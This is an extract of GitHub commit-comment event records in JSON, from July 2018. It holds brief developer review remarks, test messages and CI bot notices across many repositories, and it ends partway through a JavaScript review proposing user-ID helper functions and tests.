{"id":"8001403966","type":"CommitCommentEvent","actor":{"login":"francischu"},"repo":{"name":"francischu/Test3"},"payload":{"comment":{"id":29795253,"position":null,"line":null,"path":null,"commit_id":"763922afbd93923aae3f9904ce8ff2f8a3f1699c","created_at":"2018-07-23T02:46:12Z","updated_at":"2018-07-23T02:46:12Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [aaa](https://trello.com/c/nRACvoVR/2-aaa)"}},"created_at":"2018-07-23T02:46:12Z"}
{"id":"8001405471","type":"CommitCommentEvent","actor":{"login":"rjbain"},"repo":{"name":"rjbain/dgreat"},"payload":{"comment":{"id":29795256,"position":null,"line":null,"path":null,"commit_id":"4ab411c2c6a66298c842d6ba8f85631f4e5376af","created_at":"2018-07-23T02:46:51Z","updated_at":"2018-07-23T02:46:51Z","author_association":"OWNER","body":"Created multidev environment [dgreat#pr-256](https://dashboard.pantheon.io/sites/41cad7fe-472d-43a9-a470-d391b9622376#pr-256).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://pr-256-dgreat.pantheonsite.io/)"}},"created_at":"2018-07-23T02:46:51Z"}
{"id":"8001406650","type":"CommitCommentEvent","actor":{"login":"qyhqyh"},"repo":{"name":"qyhqyh/week-1"},"payload":{"comment":{"id":29795258,"position":1,"line":1,"path":"myfile.txt/.swp","commit_id":"b665349faaf1529da7358a2469d53ece424352b9","created_at":"2018-07-23T02:47:22Z","updated_at":"2018-07-23T02:47:22Z","author_association":"OWNER","body":"hello myself"}},"created_at":"2018-07-23T02:47:22Z"}
{"id":"8001420725","type":"CommitCommentEvent","actor":{"login":"AayanH06"},"repo":{"name":"AayanH06/discordserver"},"payload":{"comment":{"id":29795268,"position":null,"line":null,"path":null,"commit_id":"d0bec866fc33d1cf5e1bb90b8cd1d73bb670e00e","created_at":"2018-07-23T02:53:27Z","updated_at":"2018-07-23T02:53:27Z","author_association":"OWNER","body":"Testing 1...2...3... perfection"}},"created_at":"2018-07-23T02:53:27Z"}
{"id":"8001421511","type":"CommitCommentEvent","actor":{"login":"soumith"},"repo":{"name":"pytorch/pytorch"},"payload":{"comment":{"id":29795270,"position":3,"line":3,"path":"requirements.txt","commit_id":"1d109c604d0365055ea30ea02fa9b25e9f3c978a","created_at":"2018-07-23T02:53:49Z","updated_at":"2018-07-23T02:53:49Z","author_association":"MEMBER","body":"you would want to remove this. `scipy` is an optional test-only dependency on PyTorch.\r\n\r\nWhat we need to do is update our docker images / CI build scripts to use scipy >= 1.0.\r\ncc: @yf225 who can help with that."}},"created_at":"2018-07-23T02:53:49Z"}
{"id":"8001421602","type":"CommitCommentEvent","actor":{"login":"AayanH06"},"repo":{"name":"AayanH06/discordserver"},"payload":{"comment":{"id":29795271,"position":3,"line":3,"path":"README.md","commit_id":"d0bec866fc33d1cf5e1bb90b8cd1d73bb670e00e","created_at":"2018-07-23T02:53:52Z","updated_at":"2018-07-23T02:53:52Z","author_association":"OWNER","body":"jeksdf"}},"created_at":"2018-07-23T02:53:52Z"}
{"id":"8001423189","type":"CommitCommentEvent","actor":{"login":"negebauer-bot"},"repo":{"name":"negebauer/Siding"},"payload":{"comment":{"id":29795273,"position":null,"line":null,"path":null,"commit_id":"13ace34d5fc2973472a81270c722bf71d33617ab","created_at":"2018-07-23T02:54:33Z","updated_at":"2018-07-23T02:54:33Z","author_association":"NONE","body":"comment on commit"}},"created_at":"2018-07-23T02:54:33Z"}
{"id":"8001423954","type":"CommitCommentEvent","actor":{"login":"TimMoore"},"repo":{"name":"lagom/lagom"},"payload":{"comment":{"id":29795274,"position":24,"line":24,"path":"service/javadsl/integration-tests/src/test/scala/com/lightbend/lagom/it/AdNauseamRouter.scala","commit_id":"7a4eab1c7f0d758e81af781243d7838d4e5ea966","created_at":"2018-07-23T02:54:53Z","updated_at":"2018-07-23T02:54:53Z","author_association":"MEMBER","body":"Maybe if the prefix stuff is removed and this is changed to `` case `msg` `` (i.e., match on the name of the router itself) it will do the right thing?"}},"created_at":"2018-07-23T02:54:53Z"}
{"id":"8001427861","type":"CommitCommentEvent","actor":{"login":"jgreno"},"repo":{"name":"jgreno/web"},"payload":{"comment":{"id":29795275,"position":null,"line":null,"path":null,"commit_id":"4c3987be6091bf7b0e936a3f0add2aa11d0b13c3","created_at":"2018-07-23T02:56:36Z","updated_at":"2018-07-23T02:56:36Z","author_association":"OWNER","body":"update"}},"created_at":"2018-07-23T02:56:36Z"}
{"id":"8001428300","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29795276,"position":null,"line":null,"path":null,"commit_id":"d7413d4149a5778f958907ee4b4fa40d5bd7cea7","created_at":"2018-07-23T02:56:48Z","updated_at":"2018-07-23T02:56:48Z","author_association":"NONE","body":"#6599-HVACAirloopUnitarySystem-does-not-honor-continuous-fan-mode-using-multispeed-heating-coil (rraustad) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug: OK (1696 of 1696 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-d7413d4149a5778f958907ee4b4fa40d5bd7cea7-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-d7413d4149a5778f958907ee4b4fa40d5bd7cea7-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-d7413d4149a5778f958907ee4b4fa40d5bd7cea7-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-40.04%25-green.png)</a>\n"}},"created_at":"2018-07-23T02:56:48Z"}
{"id":"8001432685","type":"CommitCommentEvent","actor":{"login":"Playhi"},"repo":{"name":"Playhi/FreezeYou"},"payload":{"comment":{"id":29795282,"position":null,"line":null,"path":null,"commit_id":"ae97aff304debe6c64ae821302e76d40b6dad6cf","created_at":"2018-07-23T02:58:43Z","updated_at":"2018-07-23T02:58:43Z","author_association":"OWNER","body":"感謝 [**_delphinuz_**](https://github.com/delphinuz) 提供的繁體中文翻譯"}},"created_at":"2018-07-23T02:58:43Z"}
{"id":"8001433419","type":"CommitCommentEvent","actor":{"login":"timothyhsieh"},"repo":{"name":"timothyhsieh/msgu"},"payload":{"comment":{"id":29795283,"position":null,"line":null,"path":null,"commit_id":"5e6716019f70a789266f79d609750d33b219c2da","created_at":"2018-07-23T02:59:03Z","updated_at":"2018-07-23T02:59:03Z","author_association":"OWNER","body":"Created multidev environment [msgu#ci-24](https://dashboard.pantheon.io/sites/a133f0bb-8664-4ab1-8026-2ca11ca8aa7e#ci-24).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-24-msgu.pantheonsite.io/)"}},"created_at":"2018-07-23T02:59:03Z"}
{"id":"8001434774","type":"CommitCommentEvent","actor":{"login":"narspt"},"repo":{"name":"juribeparada/MMDVM_CM"},"payload":{"comment":{"id":29795284,"position":null,"line":null,"path":null,"commit_id":"c7e02fecd0467954d9cb0110b569103825990b6b","created_at":"2018-07-23T02:59:39Z","updated_at":"2018-07-23T02:59:39Z","author_association":"NONE","body":"And you were right, it was a permissions problem with existing log file created by older version with different owner. I was puzzled why after your last update to just fix stderr msgs I was still not getting an error, but it just got running ok... but I see now why, it was because after midnight it started using a new log file - that fixed it not running and not your update :)"}},"created_at":"2018-07-23T02:59:39Z"}
{"id":"8006098017","type":"CommitCommentEvent","actor":{"login":"ernius"},"repo":{"name":"astump/cedilleum-spec"},"payload":{"comment":{"id":29805246,"position":null,"line":null,"path":null,"commit_id":"d57226c0ed6de3282ba38b538e65d0b107e64f3e","created_at":"2018-07-23T20:00:05Z","updated_at":"2018-07-23T20:00:05Z","author_association":"COLLABORATOR","body":"Ok I understand. No, I think the naming is ok, it was my error. Perhaps adding the types of toVec/len, as you did to explain to me, in this example could help to clarify."}},"created_at":"2018-07-23T20:00:05Z"}
{"id":"8006106909","type":"CommitCommentEvent","actor":{"login":"SharedMocha"},"repo":{"name":"SharedMocha/neo-python"},"payload":{"comment":{"id":29805271,"position":null,"line":null,"path":null,"commit_id":"ac41e581c2ee819704f80879117f06f196c22f4a","created_at":"2018-07-23T20:01:47Z","updated_at":"2018-07-23T20:01:47Z","author_association":"OWNER","body":"Testing Local CHanges"}},"created_at":"2018-07-23T20:01:47Z"}
{"id":"8006108274","type":"CommitCommentEvent","actor":{"login":"VictorGijsbers"},"repo":{"name":"i7/kerkerkruip"},"payload":{"comment":{"id":29805277,"position":null,"line":null,"path":null,"commit_id":"d15ccc0101006539a11c0f2f422f9d3dfcff5cce","created_at":"2018-07-23T20:02:02Z","updated_at":"2018-07-23T20:02:02Z","author_association":"MEMBER","body":"Here's what I think is happening, but correct me if I'm wrong. Dealing damage now always checks whether concentration is broken -- the phrase \"have ... inflict damage on ...\" makes this happen for cases other than striking a blow, and the aftereffects rules make it happen for cases in which a blow is struck. However, this is now also always a chance process: your mind score and certain items sometimes allow you to keep concentration. In non-combat situations, this happens silently. (You get a message when concentration is broken, but not when you remain concentrated -- seemed right to me, but discuss if you think it's a bad idea.) So is it possible that in this test, the player simply succeeds the check and therefore doesn't lose concentration? If so, the test needs to be tweaked a bit."}},"created_at":"2018-07-23T20:02:02Z"}
{"id":"8006109562","type":"CommitCommentEvent","actor":{"login":"timothyhsieh"},"repo":{"name":"timothyhsieh/msgu"},"payload":{"comment":{"id":29805279,"position":null,"line":null,"path":null,"commit_id":"bc96b7b72c75f1477464a950475cad91229acf83","created_at":"2018-07-23T20:02:15Z","updated_at":"2018-07-23T20:02:15Z","author_association":"OWNER","body":"Created multidev environment [msgu#pr-3](https://dashboard.pantheon.io/sites/a133f0bb-8664-4ab1-8026-2ca11ca8aa7e#pr-3).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://pr-3-msgu.pantheonsite.io/)"}},"created_at":"2018-07-23T20:02:15Z"}
{"id":"8006117650","type":"CommitCommentEvent","actor":{"login":"oliver----"},"repo":{"name":"substance/texture"},"payload":{"comment":{"id":29805300,"position":6,"line":16,"path":"src/article/metadata/EntityDatabase.js","commit_id":"3fb0885c114d6641686696b1114a24dca0231348","created_at":"2018-07-23T20:03:53Z","updated_at":"2018-07-23T20:03:53Z","author_association":"MEMBER","body":"BTW: default means it *is* optional"}},"created_at":"2018-07-23T20:03:53Z"}
{"id":"8006123309","type":"CommitCommentEvent","actor":{"login":"scopatz"},"repo":{"name":"Quansight/conda-recipe-cudatoolkit-dev"},"payload":{"comment":{"id":29805314,"position":19,"line":17,"path":"condarecipe9.2/scripts/activate.d/cudatoolkit-dev-activate.sh","commit_id":"eb4d5befd4c9a9a4d67fd77e5b20093bbec5957b","created_at":"2018-07-23T20:05:02Z","updated_at":"2018-07-23T20:05:02Z","author_association":"NONE","body":"I thought that these variable are availble durring activate / deactivate.  \r\n\r\nIf they aren't, you can always make these Jinja2 templates, which you then evaluate durring the build and insert the version number."}},"created_at":"2018-07-23T20:05:02Z"}
{"id":"8006124968","type":"CommitCommentEvent","actor":{"login":"scopatz"},"repo":{"name":"Quansight/conda-recipe-cudatoolkit-dev"},"payload":{"comment":{"id":29805316,"position":19,"line":17,"path":"condarecipe9.2/scripts/activate.d/cudatoolkit-dev-activate.sh","commit_id":"eb4d5befd4c9a9a4d67fd77e5b20093bbec5957b","created_at":"2018-07-23T20:05:22Z","updated_at":"2018-07-23T20:05:22Z","author_association":"NONE","body":"This shouldn't be so bad, because you are already relying on Python"}},"created_at":"2018-07-23T20:05:22Z"}
{"id":"8006126896","type":"CommitCommentEvent","actor":{"login":"jcamilosarmientor"},"repo":{"name":"udistrital/financiera_mongo_crud"},"payload":{"comment":{"id":29805327,"position":null,"line":null,"path":null,"commit_id":"30afafe6482900117d4fc4fea2e6b11b6d1e430d","created_at":"2018-07-23T20:05:45Z","updated_at":"2018-07-23T20:05:45Z","author_association":"COLLABORATOR","body":"con @miguelramirez93 "}},"created_at":"2018-07-23T20:05:45Z"}
{"id":"8006132366","type":"CommitCommentEvent","actor":{"login":"Benerdchia"},"repo":{"name":"github/opensource.guide"},"payload":{"comment":{"id":29805340,"position":null,"line":null,"path":null,"commit_id":"e8aed57d15331c6a535a33ff300c278e5d1e6ade","created_at":"2018-07-23T20:06:52Z","updated_at":"2018-07-23T20:06:52Z","author_association":"NONE","body":"#e8aed57 "}},"created_at":"2018-07-23T20:06:52Z"}
{"id":"8006136282","type":"CommitCommentEvent","actor":{"login":"dotlambda"},"repo":{"name":"NixOS/nixpkgs"},"payload":{"comment":{"id":29805344,"position":null,"line":null,"path":null,"commit_id":"610485faa7f8c043482c4a9c030938ed315557e5","created_at":"2018-07-23T20:07:40Z","updated_at":"2018-07-23T20:07:40Z","author_association":"MEMBER","body":"Never heard of `PYTEST_ADOPTS`. If you know how to fix this, please do so.\r\nBtw, this also breaks `pytest-flake8`."}},"created_at":"2018-07-23T20:07:40Z"}
{"id":"8006141369","type":"CommitCommentEvent","actor":{"login":"forid786"},"repo":{"name":"marcelloc/Unofficial-pfSense-packages"},"payload":{"comment":{"id":29805352,"position":null,"line":null,"path":null,"commit_id":"ca4128ea02e7fce14f77cae26d050c526ff3ef52","created_at":"2018-07-23T20:08:39Z","updated_at":"2018-07-23T20:08:39Z","author_association":"CONTRIBUTOR","body":"Why bother changing these defaults? You can make your alterations using the drop down box. 1 second update interval in many cases can also be too fast. "}},"created_at":"2018-07-23T20:08:39Z"}
{"id":"8006145091","type":"CommitCommentEvent","actor":{"login":"micheleteixeira"},"repo":{"name":"mircea-vutcovici/blind-sonic"},"payload":{"comment":{"id":29805361,"position":5,"line":6,"path":"README.md","commit_id":"2812016847eafb15c4dc98ec2cdba04ad894551f","created_at":"2018-07-23T20:09:24Z","updated_at":"2018-07-23T20:09:24Z","author_association":"NONE","body":"Nice picture! "}},"created_at":"2018-07-23T20:09:24Z"}
{"id":"8006147278","type":"CommitCommentEvent","actor":{"login":"rouault"},"repo":{"name":"OSGeo/gdal"},"payload":{"comment":{"id":29805363,"position":null,"line":null,"path":null,"commit_id":"58d8db3081d7e0a3ed62121b33a60283303d8880","created_at":"2018-07-23T20:09:52Z","updated_at":"2018-07-23T20:09:52Z","author_association":"MEMBER","body":"@mdhancher You might want to have a test on it. I could only test through stub testing since my personal account doesn't have required permissions"}},"created_at":"2018-07-23T20:09:52Z"}
{"id":"8006156431","type":"CommitCommentEvent","actor":{"login":"rom1000rom"},"repo":{"name":"rom1000rom/sudoku-project"},"payload":{"comment":{"id":29805378,"position":null,"line":null,"path":null,"commit_id":"debd6c653298636d63d6a948bf82a639439afc69","created_at":"2018-07-23T20:11:42Z","updated_at":"2018-07-23T20:11:42Z","author_association":"OWNER","body":"The project contains a program for solving Sudoku puzzles of any complexity (having a single solution)."}},"created_at":"2018-07-23T20:11:42Z"}
{"id":"8006160641","type":"CommitCommentEvent","actor":{"login":"boyski33"},"repo":{"name":"s0ward/Blockchain"},"payload":{"comment":{"id":29805392,"position":16,"line":16,"path":"src/main/java/com/company/network/p2p/MiningNode.java","commit_id":"d6710e099c320d7f415aae8abecf0973765d65e0","created_at":"2018-07-23T20:12:32Z","updated_at":"2018-07-23T20:12:32Z","author_association":"COLLABORATOR","body":"Unhandled `IOException`"}},"created_at":"2018-07-23T20:12:32Z"}
{"id":"8006160678","type":"CommitCommentEvent","actor":{"login":"Pako7"},"repo":{"name":"brighanS/vclub"},"payload":{"comment":{"id":29805394,"position":19,"line":60,"path":"spec/controllers/movies_controller_spec.rb","commit_id":"ed49767a31aeaa34f7c2eab85f8f12a257466d71","created_at":"2018-07-23T20:12:33Z","updated_at":"2018-07-23T20:12:33Z","author_association":"NONE","body":"Antes de commit  haces una búsqueda para encontrar: byebug y debugger"}},"created_at":"2018-07-23T20:12:33Z"}
{"id":"8006170620","type":"CommitCommentEvent","actor":{"login":"timothyhsieh"},"repo":{"name":"timothyhsieh/msgu"},"payload":{"comment":{"id":29805413,"position":null,"line":null,"path":null,"commit_id":"7eb966cdcf5c4576c4124f43797768fe92cd8957","created_at":"2018-07-23T20:14:32Z","updated_at":"2018-07-23T20:14:32Z","author_association":"OWNER","body":"Created multidev environment [msgu#ci-45](https://dashboard.pantheon.io/sites/a133f0bb-8664-4ab1-8026-2ca11ca8aa7e#ci-45).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-45-msgu.pantheonsite.io/)"}},"created_at":"2018-07-23T20:14:32Z"}
{"id":"8006171751","type":"CommitCommentEvent","actor":{"login":"jekm321"},"repo":{"name":"jekm321/front-end-project-week"},"payload":{"comment":{"id":29805418,"position":null,"line":null,"path":null,"commit_id":"55d84ffc7d3c64292da107097e2ea02488a0c401","created_at":"2018-07-23T20:14:45Z","updated_at":"2018-07-23T20:14:45Z","author_association":"OWNER","body":"spacing from auto formatter"}},"created_at":"2018-07-23T20:14:45Z"}
{"id":"8006174381","type":"CommitCommentEvent","actor":{"login":"hramos"},"repo":{"name":"facebookarchive/react-native-custom-components"},"payload":{"comment":{"id":29805426,"position":null,"line":null,"path":null,"commit_id":"83c4fa19ccc9b6cd48ff80e457c493332819b486","created_at":"2018-07-23T20:15:15Z","updated_at":"2018-07-23T20:15:15Z","author_association":"CONTRIBUTOR","body":"@pietropizzi a fork of the repo might be a better approach. We're not planning to actively maintain repos in the \"facebookarchive\" org. The components were moved here to ensure the source code was still available for people while they migrated off."}},"created_at":"2018-07-23T20:15:15Z"}
{"id":"8006175357","type":"CommitCommentEvent","actor":{"login":"Pako7"},"repo":{"name":"brighanS/vclub"},"payload":{"comment":{"id":29805428,"position":6,"line":6,"path":"app/views/carts/new.js.erb","commit_id":"c2f69c1fef8255fea3646d497f044100c494fe92","created_at":"2018-07-23T20:15:27Z","updated_at":"2018-07-23T20:15:27Z","author_association":"NONE","body":"Las variables que sean descriptivos."}},"created_at":"2018-07-23T20:15:27Z"}
{"id":"8006175531","type":"CommitCommentEvent","actor":{"login":"jsy1218"},"repo":{"name":"DianeHu/job-description-linter"},"payload":{"comment":{"id":29805430,"position":null,"line":null,"path":null,"commit_id":"7828b1c92e0a0d3c9195580dd279bb5fb758bb0d","created_at":"2018-07-23T20:15:29Z","updated_at":"2018-07-23T20:15:29Z","author_association":"NONE","body":"Would be great if you could create a pull request against master :)"}},"created_at":"2018-07-23T20:15:29Z"}
{"id":"8006176300","type":"CommitCommentEvent","actor":{"login":"mr-koww"},"repo":{"name":"k-gavrilov/ruby_basic"},"payload":{"comment":{"id":29805433,"position":12,"line":38,"path":"lesson3/demo.rb","commit_id":"bc8f1de5560280bfce2fce47cc9d26859213c0a5","created_at":"2018-07-23T20:15:38Z","updated_at":"2018-07-23T20:15:38Z","author_association":"NONE","body":"Train::TYPE[0] не говорит ни о чем, лучше если было бы что-то вроде Train::CARGO\r\nНо так как дальше будет разделение на классы, то переделывать сейчас не надо"}},"created_at":"2018-07-23T20:15:38Z"}
{"id":"8006176459","type":"CommitCommentEvent","actor":{"login":"ignatenkobrain"},"repo":{"name":"grishka/libtgvoip"},"payload":{"comment":{"id":29805434,"position":null,"line":null,"path":null,"commit_id":"5380aaba0db661c4a21306817d1bbd46bec52fef","created_at":"2018-07-23T20:15:40Z","updated_at":"2018-07-23T20:15:40Z","author_association":"NONE","body":"tl;dr autocrap is slow and has awful syntax, cmake is better but still has horrible syntax."}},"created_at":"2018-07-23T20:15:40Z"}
{"id":"8006177556","type":"CommitCommentEvent","actor":{"login":"binwilly"},"repo":{"name":"KjellConnelly/react-native-rate"},"payload":{"comment":{"id":29805437,"position":null,"line":null,"path":null,"commit_id":"0e72097db6bf8e5691ec51ae832b8c363f5b0b88","created_at":"2018-07-23T20:15:54Z","updated_at":"2018-07-23T20:15:54Z","author_association":"NONE","body":"@KjellConnelly react-native-iap dependency seems to be unused "}},"created_at":"2018-07-23T20:15:54Z"}
{"id":"8006182300","type":"CommitCommentEvent","actor":{"login":"WestDiscGolf"},"repo":{"name":"aarondcoleman/Fitbit.NET"},"payload":{"comment":{"id":29805449,"position":null,"line":null,"path":null,"commit_id":"26b2fb61a8f197b81480a800abe9d366798aeb25","created_at":"2018-07-23T20:16:52Z","updated_at":"2018-07-23T20:16:52Z","author_association":"CONTRIBUTOR","body":"Not against the change however but would be good to know why it's needed though."}},"created_at":"2018-07-23T20:16:52Z"}
{"id":"8006184278","type":"CommitCommentEvent","actor":{"login":"Pako7"},"repo":{"name":"brighanS/vclub"},"payload":{"comment":{"id":29805453,"position":16,"line":40,"path":"spec/controllers/movies_controller_spec.rb","commit_id":"76b6185b074e649018bd796a62833d838e72c38f","created_at":"2018-07-23T20:17:17Z","updated_at":"2018-07-23T20:17:17Z","author_association":"NONE","body":"Normalmente se usa el build o create de FactoryBot para crear registros."}},"created_at":"2018-07-23T20:17:17Z"}
{"id":"8006188540","type":"CommitCommentEvent","actor":{"login":"oksana2019"},"repo":{"name":"oksana2018/Rainbow-Poem"},"payload":{"comment":{"id":29805461,"position":null,"line":null,"path":null,"commit_id":"a8eb9b5888141ed9d7387ddcb0202c9d91ccf5a4","created_at":"2018-07-23T20:18:08Z","updated_at":"2018-07-23T20:18:08Z","author_association":"NONE","body":"jjjjj"}},"created_at":"2018-07-23T20:18:08Z"}
{"id":"8006192281","type":"CommitCommentEvent","actor":{"login":"aarondcoleman"},"repo":{"name":"aarondcoleman/Fitbit.NET"},"payload":{"comment":{"id":29805469,"position":null,"line":null,"path":null,"commit_id":"26b2fb61a8f197b81480a800abe9d366798aeb25","created_at":"2018-07-23T20:18:56Z","updated_at":"2018-07-23T20:18:56Z","author_association":"OWNER","body":"@WestDiscGolf Fitbit fronts their API with CloudFlare which throws some custom / unique `4XX` and `5XX` Http status codes which aren't in the `System.Net` enum of known codes. So in this message we get random / incorrect statuses in our error logs."}},"created_at":"2018-07-23T20:18:56Z"}
{"id":"8006195248","type":"CommitCommentEvent","actor":{"login":"jrchamp"},"repo":{"name":"PHPCompatibility/PHPCompatibility"},"payload":{"comment":{"id":29805478,"position":null,"line":null,"path":null,"commit_id":"eba7501e48209d933ddb930f08830529fe6931a5","created_at":"2018-07-23T20:19:33Z","updated_at":"2018-07-23T20:19:33Z","author_association":"NONE","body":"Yay! @cmb69 accepted my correction: https://secure.php.net/manual/en/function.php-uname.php"}},"created_at":"2018-07-23T20:19:33Z"}
{"id":"8006196009","type":"CommitCommentEvent","actor":{"login":"timothyhsieh"},"repo":{"name":"timothyhsieh/msgu"},"payload":{"comment":{"id":29805482,"position":null,"line":null,"path":null,"commit_id":"0959d884f42a1ab46541af3b0ac470ba992dbf2e","created_at":"2018-07-23T20:19:42Z","updated_at":"2018-07-23T20:19:42Z","author_association":"OWNER","body":"Created multidev environment [msgu#ci-48](https://dashboard.pantheon.io/sites/a133f0bb-8664-4ab1-8026-2ca11ca8aa7e#ci-48).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-48-msgu.pantheonsite.io/)"}},"created_at":"2018-07-23T20:19:42Z"}
{"id":"8006202872","type":"CommitCommentEvent","actor":{"login":"JohannesKonings"},"repo":{"name":"JohannesKonings/ABAP-Swagger"},"payload":{"comment":{"id":29805498,"position":null,"line":null,"path":null,"commit_id":"4d88735c80c30f600655292d12bed5eaba1b604a","created_at":"2018-07-23T20:21:02Z","updated_at":"2018-07-23T20:21:02Z","author_association":"OWNER","body":"Is Abaplint not worth it for ABAP Swagger?"}},"created_at":"2018-07-23T20:21:02Z"}
{"id":"8006209208","type":"CommitCommentEvent","actor":{"login":"rootsco"},"repo":{"name":"makingsensetraining/DirectlyTraining"},"payload":{"comment":{"id":29805510,"position":64,"line":57,"path":"webapp/app/components/pages/ActionButtons/ActionButtons.jsx","commit_id":"b2fbe723d1baf1ce969bb09a20a0ac0c36cb0122","created_at":"2018-07-23T20:22:17Z","updated_at":"2018-07-23T20:22:17Z","author_association":"COLLABORATOR","body":"\r\nThe following case would give you a false positive, user id is an empty string with one or more spaces, this code would detect a valid user id, even though there's none\r\n```\r\nuser = {\r\n    id: ' ',\r\n    ...\r\n}\r\n```\r\nThe following case will throw an Exception with the above implementation \r\n```\r\n    user = undefined,\r\n    ...\r\n```\r\n`Exception Uncaught TypeError: Cannot read property 'hasOwnProperty' of undefined`\r\n\r\nUser also contains a propery`_id` set forth by the backend service in the response, this implementation does not take that into account.\r\n\r\nPlease consider the following implementation instead:\r\n\r\n`utils/user.js`\r\n\r\nuser.js\r\n```\r\nimport { get, isEmpty } from './helpers';\r\n\r\nexport function getUserId(user = {}) {\r\n  let userId = get(user, '_id');\r\n\r\n  if (!userId) {\r\n    userId = get(user, 'id');\r\n  }\r\n\r\n  return userId;\r\n}\r\n\r\nexport function isUserMatchById(sourceUser = {}, targetUser = {}) {\r\n  return getUserId(sourceUser) === getUserId(targetUser); \r\n}\r\n\r\nexport function isValidUser(user) {\r\n  return isEmpty(getUserId(user)) === false;\r\n}\r\n```\r\n\r\nuser.test.js\r\n```\r\nimport {\r\n  getUserId,\r\n  isUserMatchById,\r\n  isValidUser\r\n} from './user';\r\n\r\ndescribe('User Util', () => {\r\n  describe('getUserId', () => {\r\n    it('should be defined', () => {\r\n      expect(getUserId).toBeDefined();\r\n    });\r\n\r\n    it('should be a function', () => {\r\n      expect(getUserId).toEqual(expect.any(Function));\r\n    });\r\n\r\n    describe('User id property fallback', () => {\r\n      it('should return `_id` value, if `_id` exists', () => {\r\n        const user = { _id: 'foo'};\r\n\r\n        const result = getUserId(user);\r\n\r\n        expect(result).toBe('foo');\r\n      });\r\n\r\n      it('should return `id` value, when `id` exists and theres no `_id`', () => {\r\n        const user = { id: 'bar' };\r\n\r\n        const result = getUserId(user);\r\n\r\n        expect(result).toBe('bar');\r\n      });\r\n\r\n      it('should return `undefined` if neither `_id` nor `id` exist', () => {\r\n        const user = {};\r\n\r\n        const result = getUserId(user);\r\n\r\n        expect(result).toBe(undefined);\r\n      });\r\n\r\n      it('should return `undefined` if undefined is passed in', () => {\r\n        const result = getUserId(undefined);\r\n\r\n        expect(result).toBe(undefined);\r\n      });\r\n    });\r\n  });\r\n\r\n  describe('isUserMatchById', () => {\r\n    it('should be defined', () => {\r\n      expect(getUserId).toBeDefined();\r\n    });\r\n\r\n    it('should be a function', () => {\r\n      expect(getUserId).toEqual(expect.any(Function));\r\n    });\r\n\r\n    it('should return `true` when `id` matches', () => {\r\n      const sourceUser = { id: 'foo' };\r\n      const targetUser = { id: 'foo' };\r\n\r\n      const result = isUserMatchById(sourceUser, targetUser);\r\n\r\n      expect(result).toBe(true);\r\n    });\r\n\r\n    it('should return `false` when `id` does not match', () => {\r\n      const sourceUser = { id: 'foo' };\r\n      const targetUser = { id: 'bar' };\r\n\r\n      const result = isUserMatchById(sourceUser, targetUser);\r\n\r\n      expect(result).toBe(false);\r\n    });\r\n\r\n    it('should return `false` when `sourceUser` is empty', () => {\r\n      const sourceUser = undefined;\r\n      const targetUser = { id: 'bar' };\r\n\r\n      const result = isUserMatchById(sourceUser, targetUser);\r\n\r\n      expect(result).toBe(false);\r\n    });\r\n\r\n    it('should return `false` when `targetUser` is empty', () => {\r\n      const sourceUser = { id: 'foo' };\r\n      const targetUser = undefined;\r\n\r\n      const result = isUserMatchById(sourceUser, targetUser);\r\n\r\n      expect(result).toBe(false);\r\n    });\r\n  });\r\n\r\n  describe('isValidUser', () => {\r\n    it('should be defined', () => {\r\n      expect(getUserId).toBeDefined();\r\n    });\r\n\r\n    it('should be a function', () => {\r\n      expect(getUserId).toEqual(expect.any(Function));\r\n    });\r\n\r\n    it('should return `true` when `id` exists', () => {\r\n      expect(isValidUser({ id: 'foo' })).toBe(true);\r\n    });\r\n\r\n    it('should return `false` when `id` does not exist', () => {\r\n      expect(isValidUser({ bar: '' })).toBe(false);\r\n    });\r\n\r\n    it('should return `false` when `id` is empty', () => {\r\n      expect(isValidUser({ id: undefined })).toBe(false);\r\n    });\r\n  });\r\n});\r\n```\r\n\r\nutils/helpers.js\r\n```\r\nconst MAX_SAFE_INTEGER = 9007199254740991;\r\n\r\n/**\r\n * Checks if `value` is array-like. A value is considered array-like if it's\r\n * not a function and has a `value.length` that's an integer greater than or\r\n * equal to `0` and less than or equal to `Number.MAX_SAFE_INTEGER`.\r\n *\r\n * @param {*} value The value to check.\r\n * @returns {boolean} Returns `true` if `value` is array-like, else `false`.\r\n */\r\nconst isArrayLike = value => (\r\n  value != null &&\r\n  typeof value != 'function' &&\r\n  isLength(value.length)\r\n);\r\n\r\n/**\r\n * Checks if `value` is a valid array-like length.\r\n *\r\n * **Note:** This method is loosely based on\r\n * [`ToLength`](http://ecma-international.org/ecma-262/7.0/#sec-tolength).\r\n *\r\n * @param {*} value The value to check.\r\n * @returns {boolean} Returns `true` if `value` is a valid length, else `false`.\r\n */\r\nconst isLength = value => (\r\n  typeof value == 'number' &&\r\n  value > -1 &&\r\n  value % 1 == 0 &&\r\n  value <= MAX_SAFE_INTEGER\r\n);\r\n\r\n/**\r\n * Checks if `value` is likely a prototype object.\r\n *\r\n * @param {*} value The value to check.\r\n * @returns {boolean} Returns `true` if `value` is a prototype, else `false`.\r\n */\r\nconst isPrototype = value => {\r\n  const ctor = 